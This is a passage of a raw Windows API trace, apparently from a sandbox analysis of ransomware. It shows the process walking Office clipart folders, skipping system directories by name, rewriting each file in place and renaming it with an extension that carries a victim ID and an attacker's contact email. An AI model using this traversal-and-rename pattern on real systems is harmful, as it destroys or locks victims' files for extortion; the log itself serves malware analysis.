lpWideCharStr="9A8I36E") returned 8 [0093.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0093.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0093.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0093.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0093.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.777] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01265u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01265u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0093.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0093.778] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01332U.BMP", cAlternateFileName="")) returned 1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2=".") returned 1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="..") returned 1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="...") returned 1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="windows") returned -1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="recovery") returned -1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="perflogs") returned 1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="documents and settings") returned 1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="system volume information") returned -1 [0093.778] lstrcmpiW (lpString1="PH01332U.BMP", lpString2="msocache") returned 1 [0093.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01332U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01332U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01332U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0093.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01332U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01332U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01332U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0093.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0093.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01332u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.780] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0093.780] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0093.781] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0093.786] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.786] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0093.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.787] CloseHandle (hObject=0x314) returned 1 [0093.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0093.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0093.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0093.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0093.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01332u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01332u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0093.788] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1022edb4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1022edb4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1027b233, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01478U.BMP", cAlternateFileName="")) returned 1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2=".") returned 1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="..") returned 1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="...") returned 1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="windows") returned -1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="recovery") returned -1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="perflogs") returned 1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="documents and settings") returned 1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="system volume information") returned -1 [0093.788] lstrcmpiW (lpString1="PH01478U.BMP", lpString2="msocache") returned 1 [0093.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0093.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01478U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.788] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01478U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01478U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0093.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0093.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01478U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01478U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01478U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0093.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01478u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.790] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31968) returned 1 [0093.790] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7ce0) returned 0x24d210 [0093.790] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.805] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.805] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7ce0, lpOverlapped=0x0) returned 1 [0093.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.806] CloseHandle (hObject=0x314) returned 1 [0093.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0093.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0093.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0093.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0093.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0093.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0093.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.806] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01478u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01478u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0093.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0093.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.807] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1022edb4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01562U.BMP", cAlternateFileName="")) returned 1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2=".") returned 1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="..") returned 1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="...") returned 1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="windows") returned -1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="recovery") returned -1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="perflogs") returned 1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="documents and settings") returned 1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="$RECYCLE.BIN") returned 1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="system volume information") returned -1 [0093.807] lstrcmpiW (lpString1="PH01562U.BMP", lpString2="msocache") returned 1 [0093.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0093.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01562U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01562U.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01562U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0093.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01562U.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH01562U.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH01562U.BMP", lpUsedDefaultChar=0x0) returned 12 [0093.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0093.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01562u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.809] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0093.809] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0093.809] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0093.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.813] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0093.813] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.814] CloseHandle (hObject=0x314) returned 1 [0093.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0093.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0093.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0093.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0093.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0093.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0093.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0093.815] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01562u.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01562U.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01562u.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0093.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0093.816] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10208b6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10208b6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10208b6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH01607U.BMP", cAlternateFileName="")) returned 1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", lpString2=".") returned 1 [0093.816] lstrcmpiW (lpString1="PH01607U.BMP", 